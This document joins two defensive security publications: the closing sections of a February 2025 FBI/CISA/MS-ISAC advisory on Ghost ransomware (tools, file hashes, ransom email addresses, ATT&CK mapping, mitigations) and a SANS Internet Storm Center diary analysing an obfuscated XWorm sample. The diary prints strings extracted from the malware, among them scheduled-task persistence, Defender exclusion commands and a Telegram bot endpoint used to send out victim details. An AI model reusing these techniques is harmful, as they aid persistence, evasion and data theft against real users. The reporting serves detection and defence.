For email communication with victims, Ghost actors use legitimate email services that include traffic encryption features. [T1573] Some examples of emails services that Ghost actors have been observed using are Tutanota, Skiff, ProtonMail, Onionmail, and Mailfence.

Note: Table 2 contains a list of Ghost ransom email addresses.

Impact and Encryption

Ghost actors use Cring.exe, Ghost.exe, ElysiumO.exe, and Locker.exe, which are all ransomware executables that share similar functionality. Ghost variants can be used to encrypt specific directories or the entire system’s storage [T1486]. The nature of executables’ operability is based on command line arguments used when executing the ransomware file. Various file extensions and system folders are excluded during the encryption process to avoid encrypting files that would render targeted devices inoperable.

These ransomware payloads clear Windows Event Logs [T1070.001], disable the Volume Shadow Copy Service, and delete shadow copies to inhibit system recovery attempts [T1490]. Data encrypted with Ghost ransomware variants cannot be recovered without the decryption key. Ghost actors hold the encrypted data for ransom and typically demand anywhere from tens to hundreds of thousands of dollars in cryptocurrency in exchange for decryption software [T1486].

The impact of Ghost ransomware activity varies widely on a victim-to-victim basis. Ghost actors tend to move to other targets when confronted with hardened systems, such as those where proper network segmentation prevents lateral moment to other devices.

Indicators of Compromise (IOC)

Table 1 lists several tools and applications Ghost actors have used for their operations. The use of these tools and applications on a network should be investigated further.

Note: Authors of these tools generally state that they should not be used in illegal activity.

Table 1: Tools Leveraged by Ghost Actors
Name Description Source
Cobalt Strike Cobalt Strike is penetration testing software. Ghost actors  use an unauthorized version of Cobalt Strike. N/A
IOX Open-source proxy, used to establish a reverse proxy to a Ghost C2 server from an internal victim device. github[.]com/EddieIvan01/iox
SharpShares.exe SharpShares.exe is used to enumerate accessible network shares in a domain. Ghost actors use this primarily for host discovery. github[.]com/mitchmoser/SharpShares
SharpZeroLogon.exe SharpZeroLogon.exe attempts to exploit CVE-2020-1472 and is run against a target Domain Controller. github[.]com/leitosama/SharpZeroLogon
SharpGPPPass.exe SharpGPPPass.exe attempts to exploit CVE-2014-1812 and targets XML files created through Group Policy Preferences that may contain passwords. N/A
SpnDump.exe SpnDump.exe is used to list service principal name identifiers, which Ghost actors use for service and hostname enumeration. N/A
NBT.exe A compiled version of SharpNBTScan, a NetBIOS scanner. Ghost actors use this tool for hostname and IP address enumeration. github[.]com/BronzeTicket/SharpNBTScan
BadPotato.exe BadPotato.exe is an exploitation tool used for privilege escalation. github[.]com/BeichenDream/BadPotato
God.exe God.exe is a compiled version of GodPotato and is used for privilege escalation. github[.]com/BeichenDream/GodPotato
HFS (HTTP File Server) A portable web server program that Ghost actors use to host files for remote access and exfiltration. rejitto[.]com/hfs
Ladon 911 A multifunctional scanning and exploitation tool, often used by Ghost actors with the MS17010 option to scan for SMB vulnerabilities associated with CVE-2017-0143 and CVE-2017-0144. github[.]com/k8gege/Ladon
Web Shell A backdoor installed on a web server that allows for the execution of commands and facilitates persistent access. Slight variation of github[.]com/BeichenDream/Chunk-Proxy/blob/main/proxy.aspx
Table 2: MD5 File Hashes Associated with Ghost Ransomware Activity
File name MD5 File Hash
Cring.exe c5d712f82d5d37bb284acd4468ab3533
Ghost.exe

34b3009590ec2d361f07cac320671410

d9c019182d88290e5489cdf3b607f982
ElysiumO.exe

29e44e8994197bdb0c2be6fc5dfc15c2

c9e35b5c1dc8856da25965b385a26ec4

d1c5e7b8e937625891707f8b4b594314
Locker.exe ef6a213f59f3fbee2894bd6734bbaed2
iex.txt, pro.txt (IOX) ac58a214ce7deb3a578c10b97f93d9c3
x86.log (IOX)

c3b8f6d102393b4542e9f951c9435255

0a5c4ad3ec240fbfd00bdc1d36bd54eb
sp.txt (IOX) ff52fdf84448277b1bc121f592f753c5
main.txt (IOX) a2fd181f57548c215ac6891d000ec6b9
isx.txt (IOX) 625bd7275e1892eac50a22f8b4a6355d
sock.txt (IOX) db38ef2e3d4d8cb785df48f458b35090

Ransom Email Addresses

Table 3 is a subset of ransom email addresses that have been included in Ghost ransom notes.

Table 3: Ransom Email Addresses
Email Addresses
asauribe@tutanota.com ghostbackup@skiff.com rainbowforever@tutanota.com
cringghost@skiff.com ghosts1337@skiff.com retryit1998@mailfence.com
crptbackup@skiff.com ghosts1337@tuta.io retryit1998@tutamail.com
d3crypt@onionmail.org ghostsbackup@skiff.com rsacrpthelp@skiff.com
d3svc@tuta.io hsharada@skiff.com rsahelp@protonmail.com
eternalnightmare@tutanota.com just4money@tutanota.com sdghost@onionmail.org
evilcorp@skiff.com kellyreiff@tutanota.com shadowghost@skiff.com
fileunlock@onionmail.org kev1npt@tuta.io shadowghosts@tutanota.com
fortihooks@protonmail.com lockhelp1998@skiff.com summerkiller@mailfence.com
genesis1337@tutanota.com r.heisler@skiff.com summerkiller@tutanota.com
ghost1998@tutamail.com rainbowforever@skiff.com webroothooks@tutanota.com

Ransom Notes

Starting approximately in August 2024, Ghost actors began using TOX IDs in ransom notes as an alternative method for communicating with victims. For example: EFE31926F41889DBF6588F27A2EC3A2D7DEF7D2E9E0A1DEFD39B976A49C11F0E19E03998DBDA and E83CD54EAAB0F31040D855E1ED993E2AC92652FF8E8742D3901580339D135C6EBCD71002885B.

MITRE ATT&CK Tactics and Techniques

See Table 4 to Table 13 for all referenced threat actor tactics and techniques in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, version 16.1, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.

Table 4: Initial Access
Technique Title  ID Use
Exploit Public-Facing Application T1190 Ghost actors exploit multiple vulnerabilities in public-facing systems to gain initial access to servers.
Table 5: Execution
Technique Title  ID Use
Windows Management Instrumentation T1047 Ghost actors abuse WMI to run PowerShell scripts on other devices, resulting in their infection with Cobalt Strike Beacon malware.
PowerShell T1059.001 Ghost actors use PowerShell for various functions including to deploy Cobalt Strike.
Windows Command Shell T1059.003 Ghost actors use the Windows Command Shell to download malicious content on to victim servers.
Table 6: Persistence
Technique Title  ID Use
Account Manipulation T1098 Ghost actors change passwords for already established accounts.
Local Account T1136.001 Ghost actors create new accounts or makes modifications to local accounts.
Domain Account T1136.002 Ghost actors create new accounts or makes modifications to domain accounts.
Web Shell T1505.003 Ghost actors upload web shells to victim servers to gain access and for persistence.
Table 7: Privilege Escalation
Technique Title  ID Use
Exploitation for Privilege Escalation T1068 Ghost actors use a suite of open source tools in an attempt to gain elevated privileges through exploitation of vulnerabilities.
Token Impersonation/Theft T1134.001 Ghost actors use Cobalt Strike to steal process tokens of processes running at a higher privilege.
Table 8: Defense Evasion
Technique Title  ID Use
Application Layer Protocol: Web Protocols T1071.001 Ghost actors use HTTP and HTTPS protocols while conducting C2 operations. 
Impair Defenses: Disable or Modify Tools T1562.001 Ghost actors disable antivirus products.
Hidden Window T1564.003 Ghost actors use PowerShell to conceal malicious content within legitimate appearing command windows.
Table 9: Credential Access
Technique Title  ID Use
OS Credential Dumping T1003 Ghost actors use Mimikatz and the Cobalt Strike “hashdump” command to collect passwords and password hashes.
Table 10: Discovery
Technique Title  ID Use
Remote System Discovery T1018 Ghost actors use tools like Ladon 911 and ShapNBTScan for remote systems discovery.
Process Discovery T1057 Ghost actors run a ps command to list running processes on an infected device.
Domain Account Discovery T1087.002 Ghost actors run commands such as net group “Domain Admins” /domain to discover a list of domain administrator accounts.
Network Share Discovery T1135 Ghost actors use various tools for network share discovery for the purpose of host enumeration.
Software Discovery T1518 Ghost actors use their access to determine which antivirus software is running.
Security Software Discovery T1518.001 Ghost actors run Cobalt Strike to enumerate running antivirus software.
Table 11: Exfiltration
Technique Title  ID Use
Exfiltration Over C2 Channel T1041 Ghost actors use both web shells and Cobalt Strike to exfiltrate limited data.
Exfiltration to Cloud Storage T1567.002 Ghost actors sometimes use legitimate cloud storage providers such as Mega.nz for malicious exfiltration operations.
Table 12: Command and Control
Technique Title  ID Use
Web Protocols T1071.001 Ghost actors use Cobalt Strike Beacon malware and Cobalt Strike Team Servers which communicate over HTTP and HTTPS.
Ingress Tool Transfer T1105 Ghost actors use Cobalt Strike Beacon malware to deliver ransomware payloads to victim servers.
Standard Encoding T1132.001 Ghost actors use PowerShell commands to encode network traffic which reduces their likelihood of being detected during lateral movement.
Encrypted Channel T1573 Ghost actors use encrypted email platforms to facilitate communications. 
Table 13: Impact
Technique Title  ID Use
Data Encrypted for Impact T1486 Ghost actors use ransomware variants Cring.exe, Ghost.exe, ElysiumO.exe, and Locker.exe to encrypt victim files for ransom.
Inhibit System Recovery T1490 Ghost actors delete volume shadow copies.

Mitigations

The FBI, CISA, and MS-ISAC recommend organizations reference their #StopRansomware Guide and implement the mitigations below to improve cybersecurity posture on the basis of the Ghost ransomware activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s CPGs webpage for more information on the CPGs, including additional recommended baseline protections.

  • Maintain regular system backups that are known-good and stored offline or are segmented from source systems [CPG 2.R]. Ghost ransomware victims whose backups were unaffected by the ransomware attack were often able to restore operations without needing to contact Ghost actors or pay a ransom.
  • Patch known vulnerabilities by applying timely security updates to operating systems, software, and firmware within a risk-informed timeframe [CPG 1.E].
  • Segment networks to restrict lateral movement from initial infected devices and other devices in the same organization [CPG 2.F].
  • Require Phishing-Resistant MFA for access to all privileged accounts and email services accounts.
  • Train users to recognize phishing attempts.
  • Monitor for unauthorized use of PowerShell. Ghost actors leverage PowerShell for malicious purposes, although it is often a helpful tool that is used by administrators and defenders to manage system resources. For more information, visit NSA and CISA’s joint guidance on PowerShell best practices.
    • Implement the principle of least privilege when granting permissions so that employees who require access to PowerShell are aligned with organizational business requirements.
  • Implement allowlisting for applications, scripts, and network traffic to prevent unauthorized execution and access [CPG 3.A].
  • Identify, alert on, and investigate abnormal network activity. Ransomware activity generates unusual network traffic across all phases of the attack chain. This includes running scans to discover other network connected devices, running commands to list, add, or alter administrator accounts, using PowerShell to download and execute remote programs, and running scripts not usually seen on a network. Organizations that can successfully identify and investigate this activity are better able to interrupt malicious activity before ransomware is executed [CPG 3.A].
    • Ghost actors run a significant number of commands, scripts, and programs that IT administrators would have no legitimate reason for running. Victims who have identified and responded to this unusual behavior have successfully prevented Ghost ransomware attacks.
  • Limit exposure of services by disabling unused ports such as, RDP 3398, FTP 21, and SMB 445, and restricting access to essential services through securely configured VPNs or firewalls.
  • Enhance email security by implementing advanced filtering, blocking malicious attachments, and enabling DMARC, DKIM, and SPF to prevent spoofing [CPG 2.M].

Validate Security Controls

In addition to applying mitigations, the FBI, CISA, and MS-ISAC recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory.

To get started:

  1. Select an ATT&CK technique described in this advisory (see Table 3 to Table 13).
  2. Align your security technologies against the technique.
  3. Test your technologies against the technique.
  4. Analyze your detection and prevention technologies’ performance.
  5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.
  6. Tune your security program, including people, processes, and technologies, based on the data generated by this process.

Reporting

Your organization has no obligation to respond or provide information back to the FBI in response to this joint advisory. If, after reviewing the information provided, your organization decides to provide information to the FBI, reporting must be consistent with applicable state and federal laws.

The FBI is interested in any information that can be shared, to include logs showing communication to and from foreign IP addresses, a sample ransom note, communications with threat actors, Bitcoin wallet information, and/or decryptor files.

Additional details of interest include a targeted company point of contact, status and scope of infection, estimated loss, operational impact, date of infection, date detected, initial attack vector, and host and network-based indicators.

The FBI, CISA, and MS-ISAC do not encourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, the FBI and CISA urge you to promptly report ransomware incidents to FBI’s Internet Crime Complain Center (IC3), a local FBI Field Office, or CISA via the agency’s Incident Reporting System or its 24/7 Operations Center (report@cisa.gov) or by calling 1-844-Say-CISA (1-844-729-2472).

Disclaimer

The information in this report is being provided “as is” for informational purposes only. The FBI, CISA, and MS-ISAC do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by the FBI, CISA, and the MS-ISAC.

Version History

February 19, 2025: Initial version.

Security

XWorm Cocktail: A Mix of PE data with PowerShell Code, (Wed, Feb 19th)

Leave a comment
This post was originally published on this site

While hunting, I spent some time trying to deobfuscate a malicious file discovered on VT. It triggered my PowerShell rule. At the end, I found two files that look close together:

  • 7c2f2a9a6078d37ee241e43f392f825630016c8ca8416bfd12cd27501b6876d1 (Score: 3/61)[1]
  • d0b448d4de707a9fb611166278065afa2c52029234f7876158c8dd4798f08f9f (Score: 1/62)[2]

They are identified as “data files,” and their upload names are, respectively, “XClient.exe” and “XingCode Unblocker 2025.exe". XignCode is anti-cheat software primarily used in online games to prevent cheating, hacking, and the use of unauthorized third-party tools. Note the typo in the file name!

When you open the file, you see this:

You can spot a PowerShell function at the beginning that is used to deobfuscate data (un-Base64, decompress, …). You can also read the classic string "This program cannot be run in DOS mode.". Between binary data, you can also easily see some code. A lot of characters are encoded using "join" operations. By example:

PS C:UsersREM> -join[char[]]((503-426),(-4550+4640),(71128-5595))
MZ?

This is the very beginning of the PE file locate just after the initial function. Other pieces of code are based on a mix of small mathematical operations combined with logical operands. By example:

PS C:UsersREM> ((((((((((((((((((8657-Bxor-8656)-Band2*(8657-Band-8656))-Band((8657-Bxor-8656)-Bor2*(8657-Band-8656)))-Band(((8657-Bxor-8656)-Band2*(8657-Band-8656))-Bor((8657-Bxor-8656)-Bor2*(8657-Band-8656))))+((((8657-Bxor-8656)-Band2*(8657-Band-8656))-Band((8657-Bxor-8656)-Bor2*(8657-Band-8656)))-Bor(((8657-Bxor-8656)-Band2*(8657-Band-8656))-Bor((8657-Bxor-8656)-Bor2*(8657-Band-8656)))))+0)-0)))+0)-0)))+0)-0))))
1

Normally, PowerShell should ignore the non-readable characters but, if you try to execute this file with PowerShell in a sandbox, it miserably fails due to "bad" characters here and there. I tried to write a small script to deobfuscate all the pieces of code described above but the PE file was still corrupted.

If you extract ASCII strings from the files, you'll get a lot of interesting strings but Unicode strings are more interesting:

remnux@remnux:/mnt/hgfs/MalwareZoo/20250215$ strings --encoding=l 7c2f2a9a6078d37ee241e43f392f825630016c8ca8416bfd12cd27501b6876d1

Here are the most interesting strings:

schtasks.exe
/create /f /RL HIGHEST /sc minute /mo 1 /tn "
/create /f /sc minute /mo 1 /tn "
SOFTWAREMicrosoftWindowsCurrentVersionRun
.lnk
WScript.Shell
CreateShortcut
TargetPath
WorkingDirectory
Save
 [XWorm V5.6]
New Clinet : 
UserName : 
OSFullName : 
USB : 
CPU : 
GPU : 
RAM : 
Groub : 
https://api.telegram.org/bot
/sendMessage?chat_id=
&text=
powershell.exe
-ExecutionPolicy Bypass Add-MpPreference -ExclusionPath '
-ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '
http://ip-api.com/line/?fields=hosting
Select * from Win32_ComputerSystem
VirtualBox
SbieDll.dll
rootSecurityCenter2
Select * from AntivirusProduct
SELECT * FROM Win32_VideoController
PING!
pong
shutdown.exe /f /s /t 0
RunShell
StartDDos
StopDDos
StartReport
StopReport
Xchat
Hosts
driversetchosts
Modified successfully!
sendPlugin
savePlugin
RemovePlugins
Plugins Removed!
OfflineGet
RunRecovery
Recovery
RunOptions
POST / HTTP/1.1
schtasks
/delete /f  /tn "
.bat
@echo off
timeout 3 > NUL
DEL "
" /f /q
ToUpper
Space
[SPACE]
)eturn
[ENTER]
)scape
[ESC]
LControlKey
)CTRL]
RControlKey
RShiftKey
[Shift]
LShiftKey
Back
)Back]
LWin
)WIN]
)Tab]
Capital
[CAPSLOCK: OFF]
[CAPSLOCK: ON]

It's crystal clear that the malware is a copy of XWorm[3].

I'm curious about the obfuscation tool/technique used in these files. If you know how to process them without error, let me know!

[1] https://www.virustotal.com/gui/file/7c2f2a9a6078d37ee241e43f392f825630016c8ca8416bfd12cd27501b6876d1
[2] https://www.virustotal.com/gui/file/d0b448d4de707a9fb611166278065afa2c52029234f7876158c8dd4798f08f9f
[3] https://any.run/report/add19a9db4730f41575fb951e9aec6dcf35d8db2cb94cba896667881467e6fd5/8d974012-b880-482f-a35f-68a0808a2e33

Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.